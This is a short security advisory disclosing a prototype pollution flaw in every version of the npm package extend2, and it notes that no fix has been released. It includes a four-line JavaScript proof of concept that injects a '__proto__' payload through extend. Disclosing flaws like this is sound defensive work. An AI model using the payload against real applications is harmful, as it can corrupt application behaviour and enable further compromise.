Summary

Affected versions of extend2 (npm) are vulnerable to prototype pollution via the extend function.

Product

All versions of extend2 (npm).

Impact

If untrusted data reaches one of the affected functions, prototype pollution can be achieved. The impact will depend on the application.

Steps to reproduce

1
2
3
4
const extend = require('extend2');
a = {'a':1};
extend(true, {}, a, JSON.parse('{"__proto__":{"polluted":1}}'));
console.log({}.polluted);

Expected result:

1 will be printed to the console.

Remediation

Currently no fix has been released. As a workaround, avoid passing untrusted inputs to the vulnerable function.

Credit

This issue was discovered and reported by Checkmarx SCA Security Researcher Yaniv Nizry.

Resources

  1. NPM Package